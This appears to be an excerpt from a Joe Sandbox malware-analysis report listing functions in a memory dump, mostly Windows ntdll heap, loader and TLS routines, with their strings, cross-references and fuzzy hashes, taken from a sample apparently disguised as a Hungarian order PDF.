                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: GlobalizationUserSettings$TargetNtPath$\Registry\Machine\SYSTEM\CurrentControlSet\Control\International
                                              • API String ID: 0-505981995
                                              • Opcode ID: 242dbe2d252c336dd533e56c77eedf0ed702b248e183888424a0eee661c665bb
                                              • Instruction ID: 47a026dea32b096e86de1c2230a192e444fcd5dd552c3d45f5f022204de2adcd
                                              • Opcode Fuzzy Hash: 242dbe2d252c336dd533e56c77eedf0ed702b248e183888424a0eee661c665bb
                                              • Instruction Fuzzy Hash: E1617172D02228AFDB21DF54DC88BD9B7B8EF55760F4101E9A908A7260CB749E84CF90
                                              Function 3355F7BA Relevance: 3.9, Strings: 3, Instructions: 167COMMON
                                              Download Yara Rule
                                              Strings
                                              • HEAP: , xrefs: 335BE6B3
                                              • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 335BE6C6
                                              • HEAP[%wZ]: , xrefs: 335BE6A6
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                              • API String ID: 0-1340214556
                                              • Opcode ID: 76a852ac5836ebb62dbd42b8816eafca19701ef6362876c95c90119750ef51f0
                                              • Instruction ID: faf659619213a0fe0968a42649241b091738af4dc2773f0ce10d64f585ec39a4
                                              • Opcode Fuzzy Hash: 76a852ac5836ebb62dbd42b8816eafca19701ef6362876c95c90119750ef51f0
                                              • Instruction Fuzzy Hash: 7A51E175A04784EFF712CBA4F984F9ABBF8AF05340F0805A6E581CB692D774E910CB60
                                              Function 335815F4 Relevance: 3.9, Strings: 3, Instructions: 166COMMON
                                              Download Yara Rule
                                              Strings
                                              • LdrpCompleteMapModule, xrefs: 335CA590
                                              • Could not validate the crypto signature for DLL %wZ, xrefs: 335CA589
                                              • minkernel\ntdll\ldrmap.c, xrefs: 335CA59A
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                              • API String ID: 0-1676968949
                                              • Opcode ID: 688c9b8caa0c70599397536bb9d0efdcf77fd073fad2e25cd582fc677e77d55d
                                              • Instruction ID: d68e5158f87c38c69b0c4d80b55897c8b6bfa2bfdcee9d07c59d15387adccb2b
                                              • Opcode Fuzzy Hash: 688c9b8caa0c70599397536bb9d0efdcf77fd073fad2e25cd582fc677e77d55d
                                              • Instruction Fuzzy Hash: B6513578B007849BEB11CF69E940B467BF8EF40758F584564E9919FAE2DB74EA40CB80
                                              Function 3360DAAC Relevance: 3.9, Strings: 3, Instructions: 163COMMON
                                              Download Yara Rule
                                              Strings
                                              • Heap block at %p modified at %p past requested size of %Ix, xrefs: 3360DC32
                                              • HEAP: , xrefs: 3360DC1F
                                              • HEAP[%wZ]: , xrefs: 3360DC12
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: HEAP: $HEAP[%wZ]: $Heap block at %p modified at %p past requested size of %Ix
                                              • API String ID: 0-3815128232
                                              • Opcode ID: 221d90b5dfedf5e8d451e485d463ae211b9aa3a8b8ea2c68e607377fd9c191a4
                                              • Instruction ID: c52347967498eb8dddacaccefff963402ddf1f5411b37bd06e60333e67c485f0
                                              • Opcode Fuzzy Hash: 221d90b5dfedf5e8d451e485d463ae211b9aa3a8b8ea2c68e607377fd9c191a4
                                              • Instruction Fuzzy Hash: B55136B91083508EF368CA29CD4277277F5DF46284F844A9AE4C18B587D775D843DF22
                                              Function 33561B04 Relevance: 3.9, Strings: 3, Instructions: 148COMMON
                                              Download Yara Rule
                                              Strings
                                              • HEAP: , xrefs: 335BFB58
                                              • HEAP[%wZ]: , xrefs: 335BFB4B
                                              • RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex)), xrefs: 335BFB63
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: HEAP: $HEAP[%wZ]: $RtlpGetBitState(LookupTable, (ULONG)(LookupIndex - LookupTable->BaseIndex))
                                              • API String ID: 0-1596344177
                                              • Opcode ID: 5a835d640538e06688f87e5034b72d28e62887446012868ab3ec296d0a3f6c75
                                              • Instruction ID: a5e08b4fd2c25d7e3c92c27f04bcdb9865a1445be5947947c3eb0292b7ca4f33
                                              • Opcode Fuzzy Hash: 5a835d640538e06688f87e5034b72d28e62887446012868ab3ec296d0a3f6c75
                                              • Instruction Fuzzy Hash: F051E035A00215EFEB04CF68D484A69BBF5FF45318F599199E8949F252D730EE42CF90
                                              Function 3355758F Relevance: 3.9, Strings: 3, Instructions: 132COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: HEAP: $HEAP[%wZ]: $Invalid address specified to %s( %p, %p )
                                              • API String ID: 0-1151232445
                                              • Opcode ID: 14206c426dcab7867e983c6e7a6c9073adb7efe915709653431258a3dea89381
                                              • Instruction ID: dd394e50ad9ba716332ee50e68f4f3afebb524858734795fb7a862991bdedc07
                                              • Opcode Fuzzy Hash: 14206c426dcab7867e983c6e7a6c9073adb7efe915709653431258a3dea89381
                                              • Instruction Fuzzy Hash: DA4106B8201380CFFF15CE1DE480BB97BF59F41384F9844AAF4878B646DA64E489CB91
                                              Function 335916CF Relevance: 3.9, Strings: 3, Instructions: 127COMMON
                                              Download Yara Rule
                                              Strings
                                              • TlsVector %p Index %d : %d bytes copied from %p to %p, xrefs: 335D1B39
                                              • LdrpAllocateTls, xrefs: 335D1B40
                                              • minkernel\ntdll\ldrtls.c, xrefs: 335D1B4A
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LdrpAllocateTls$TlsVector %p Index %d : %d bytes copied from %p to %p$minkernel\ntdll\ldrtls.c
                                              • API String ID: 0-4274184382
                                              • Opcode ID: 504ffc85907c18dc3682f3796c33ae606d80cb2302d68b2b6df6855f98e2ddf9
                                              • Instruction ID: 0dc1c1cb4ebcd51855dd9e5910f984c1d535ea0a458010fe89b7ef8acd8b50ca
                                              • Opcode Fuzzy Hash: 504ffc85907c18dc3682f3796c33ae606d80cb2302d68b2b6df6855f98e2ddf9
                                              • Instruction Fuzzy Hash: C84188B5E01709AFEB05CFA8EC40BAEBBF5FF88754F548529E405A7610DB74A901CB90
                                              Function 33615180 Relevance: 3.9, Strings: 3, Instructions: 114COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Leaked Block 0x%p size 0x%p (stack %p depth %u)$HEAP: $HEAP[%wZ]:
                                              • API String ID: 0-964947082
                                              • Opcode ID: 25247429945c0425fbc23d14d5516d235c3474b48f06e14b2d6c5b2df9b1324f
                                              • Instruction ID: afa4543eea9253d06a4f12220eced68a8482e7e7cba5c6fe7f10d9f547640f87
                                              • Opcode Fuzzy Hash: 25247429945c0425fbc23d14d5516d235c3474b48f06e14b2d6c5b2df9b1324f
                                              • Instruction Fuzzy Hash: 0C41EFB2E01348AFE701DF65C990B6AFBF4EB44310F40452AEA01A7341D630D864CB59
                                              Function 335933A0 Relevance: 3.9, Strings: 3, Instructions: 111COMMON
                                              Download Yara Rule
                                              Strings
                                              • Actx , xrefs: 335933AC
                                              • SXS: %s() passed the empty activation context data, xrefs: 335D29FE
                                              • RtlCreateActivationContext, xrefs: 335D29F9
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: Actx $RtlCreateActivationContext$SXS: %s() passed the empty activation context data
                                              • API String ID: 0-859632880
                                              • Opcode ID: 22c0bc1b02a550b8a1bc42de9c06cca21fca7241a1913f90071835349b968066
                                              • Instruction ID: c596785d59f4b509a4030d5aa0b21bf5b6a9f0b4e78bd804688e8a3ad0eb0d7a
                                              • Opcode Fuzzy Hash: 22c0bc1b02a550b8a1bc42de9c06cca21fca7241a1913f90071835349b968066
                                              • Instruction Fuzzy Hash: 15310432600305DFEB16CF68E884BDA77A4EF94760F564869ED08DF281DB70D941CB90
                                              Function 335EB594 Relevance: 3.9, Strings: 3, Instructions: 107COMMON
                                              Download Yara Rule
                                              Strings
                                              • GlobalFlag, xrefs: 335EB68F
                                              • @, xrefs: 335EB670
                                              • \Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\, xrefs: 335EB632
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$GlobalFlag$\Registry\Machine\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\
                                              • API String ID: 0-4192008846
                                              • Opcode ID: db1cf6d5d6e45aef640b57f8dd71413483a594d3428ad378e25365a9d5fec1eb
                                              • Instruction ID: ddcba8c2f935cf1c862b257429cc52a15ef3dbc6ff22286fb5cd362b354291a9
                                              • Opcode Fuzzy Hash: db1cf6d5d6e45aef640b57f8dd71413483a594d3428ad378e25365a9d5fec1eb
                                              • Instruction Fuzzy Hash: 11316CB5E01209AFDB00DFA4EC80AEEBBBCEF44784F940469E605E7650D7749E04CBA4
                                              Function 336013B9 Relevance: 3.9, Strings: 3, Instructions: 101COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$OsBootstatPath$\REGISTRY\MACHINE\SYSTEM\CurrentControlSet\Control
                                              • API String ID: 0-1050206962
                                              • Opcode ID: 4b284b1dde70ae9fce1817555b4e418b5de3ede1d8a4df2463dd22ec56fac0e5
                                              • Instruction ID: ea1e720a5d454b0e8b1d5748cd07877c0b0074bb0c41aff998de94b7831be2c2
                                              • Opcode Fuzzy Hash: 4b284b1dde70ae9fce1817555b4e418b5de3ede1d8a4df2463dd22ec56fac0e5
                                              • Instruction Fuzzy Hash: EA318C76D0061DAFDB02DF94DC81EAEBBBDEB44694F810865EA00A7620D734DD089BA0
                                              Function 33591607 Relevance: 3.8, Strings: 3, Instructions: 98COMMON
                                              Download Yara Rule
                                              Strings
                                              • DLL "%wZ" has TLS information at %p, xrefs: 335D1A40
                                              • minkernel\ntdll\ldrtls.c, xrefs: 335D1A51
                                              • LdrpInitializeTls, xrefs: 335D1A47
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: DLL "%wZ" has TLS information at %p$LdrpInitializeTls$minkernel\ntdll\ldrtls.c
                                              • API String ID: 0-931879808
                                              • Opcode ID: bb12308e12541ee158aa1cea10c8cabeb8a23abfdb35842b32cefbbc8afc1dc7
                                              • Instruction ID: 3e688e83118796e13e47dde54493c45a4553920b84468823fdaf9b52f4742cda
                                              • Opcode Fuzzy Hash: bb12308e12541ee158aa1cea10c8cabeb8a23abfdb35842b32cefbbc8afc1dc7
                                              • Instruction Fuzzy Hash: D831E172E00314BFF710DF48D858FAA76B9AB81384F440569F602B7990DB70BA058790
                                              Function 335574B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 117timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: RtlValidateHeap
                                              • API String ID: 3446177414-1797218451
                                              • Opcode ID: 1579e059d3b59d3bb769c1d40156ee69d84aaa36fc3c454e26e2a18c5c576af4
                                              • Instruction ID: 3c8935205cb9045c9961d357330194fc1ca1f251f999849744ac25e87e2e6ef1
                                              • Opcode Fuzzy Hash: 1579e059d3b59d3bb769c1d40156ee69d84aaa36fc3c454e26e2a18c5c576af4
                                              • Instruction Fuzzy Hash: 6F411476F013859FEF02DF74E4907AEBBB6BF81250F48865AF4525B680CB34A901DB94
                                              Function 3360705E Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 112timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: kLsE
                                              • API String ID: 3446177414-3058123920
                                              • Opcode ID: 4936944dd2b94b77d4ae533013ef104851b847374df9e5c4352260c598e46bb4
                                              • Instruction ID: 5bc62e0f3a064d00d0ec0ac0e5d93168dec1aa0021a42c392e00cbb53dc15ba4
                                              • Opcode Fuzzy Hash: 4936944dd2b94b77d4ae533013ef104851b847374df9e5c4352260c598e46bb4
                                              • Instruction Fuzzy Hash: 5A4138B19063516FF715EB60DA46B653FE4AB40768F582678FC50AB0C5C7744483CBA2
                                              Function 335752A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$@
                                              • API String ID: 0-149943524
                                              • Opcode ID: 696c7e0df6e578f9ae7b55a4123b99c0538eb9b0fc9e16d6bad8d78edb1b49b7
                                              • Instruction ID: 71c3211e7be1dfa0080c2818acc2a3d8627aff4d55a71ff88d80e304d07037cc
                                              • Opcode Fuzzy Hash: 696c7e0df6e578f9ae7b55a4123b99c0538eb9b0fc9e16d6bad8d78edb1b49b7
                                              • Instruction Fuzzy Hash: A6329BB85083518BD724CF14E490B6EB7F5EF88784F984D2EF9859B2A0E734D944CB92
                                              Function 33565702 Relevance: 3.1, APIs: 2, Instructions: 104timeCOMMON
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID:
                                              • API String ID: 3446177414-0
                                              • Opcode ID: 056931838501a3295f669c7d34e82468456edd6fb92cb2ee3c8436de19b672f4
                                              • Instruction ID: 32b73f8ffb360b5afc79f22c4bf704628191cfe3cbf1312d9d9f895630874271
                                              • Opcode Fuzzy Hash: 056931838501a3295f669c7d34e82468456edd6fb92cb2ee3c8436de19b672f4
                                              • Instruction Fuzzy Hash: 0231EF35601B06FFE7458F60EA80A89FBB9FF84398F446425E94087E50DB74E820CBD0
                                              Function 335E1ACB Relevance: 2.8, Strings: 2, Instructions: 278COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @$AddD
                                              • API String ID: 0-2525844869
                                              • Opcode ID: c05c924385dd8c4ab2c2bb24a808161ddf36cb08927c549b9ab60b8d56d32369
                                              • Instruction ID: b1abaddaa803a14215d1620fc777f8357f54fd18c22b77dad9debf2dc3d5beed
                                              • Opcode Fuzzy Hash: c05c924385dd8c4ab2c2bb24a808161ddf36cb08927c549b9ab60b8d56d32369
                                              • Instruction Fuzzy Hash: 23A168B2608300AFE315CF54D945BABF7EDFB84304F954A2EF99586250E770EA04CB62
                                              Function 3357F720 Relevance: 2.7, Strings: 2, Instructions: 159COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID: DebugPrintTimes
                                              • String ID: $$$
                                              • API String ID: 3446177414-233714265
                                              • Opcode ID: 0ecbb78ea884a33f7c253aa5a15f7d419e7fa3326bbbdd8572372e043247bff9
                                              • Instruction ID: b68b7786b3fd466bc85fc805955ef6fc056c8540db12d35605d45c0cf9bf4f49
                                              • Opcode Fuzzy Hash: 0ecbb78ea884a33f7c253aa5a15f7d419e7fa3326bbbdd8572372e043247bff9
                                              • Instruction Fuzzy Hash: 276123B1E00789DFEB20CFA4E594BADB7F1FF84318F444529D525ABA80CB74A941CB90
                                              Function 335F35BA Relevance: 2.6, Strings: 2, Instructions: 99COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
                                              • API String ID: 0-118005554
                                              • Opcode ID: 5b9e2bdef8a581f02a2a2e228a49df045ef35c47d0a6edeea5319c753cc47078
                                              • Instruction ID: 0142464af94f558ceba8b4bac27804550c8a133a9575d849b8f7987cb969ed01
                                              • Opcode Fuzzy Hash: 5b9e2bdef8a581f02a2a2e228a49df045ef35c47d0a6edeea5319c753cc47078
                                              • Instruction Fuzzy Hash: C731CD75609781DBE302CF68F844B1AB7E4EFA5760F450869F894CB790EB32D905CB92
                                              Function 3359329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: .Local\$@
                                              • API String ID: 0-380025441
                                              • Opcode ID: a5c6adc85836945540ff32fcb38530bceda12588a5b0efd6810ea645ae67aee9
                                              • Instruction ID: d25ec825c415047236e7ed57d0ce6b911dcad46189b7365d2aeb9400ee8d5053
                                              • Opcode Fuzzy Hash: a5c6adc85836945540ff32fcb38530bceda12588a5b0efd6810ea645ae67aee9
                                              • Instruction Fuzzy Hash: 17316FB6548704EFE311CF28E481A9BBBF8EF98694F48092EF59483650DA34DD05CB92
                                              Function 335934B0 Relevance: 2.6, Strings: 2, Instructions: 66COMMON
                                              Download Yara Rule
                                              Strings
                                              • RtlpInitializeAssemblyStorageMap, xrefs: 335D2A90
                                              • SXS: %s() bad parameters:SXS: Map : 0x%pSXS: EntryCount : 0x%lx, xrefs: 335D2A95
                                              Memory Dump Source
                                              • Source File: 00000005.00000002.2968109783.0000000033530000.00000040.00001000.00020000.00000000.sdmp, Offset: 33530000, based on PE: true
                                              • Associated: 00000005.00000002.2968109783.0000000033659000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.000000003365D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              • Associated: 00000005.00000002.2968109783.00000000336CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_5_2_33530000_Rendel#U00e9si sz#U00e1m 11-2024-pdf.jbxd
                                              Similarity
                                              • API ID:
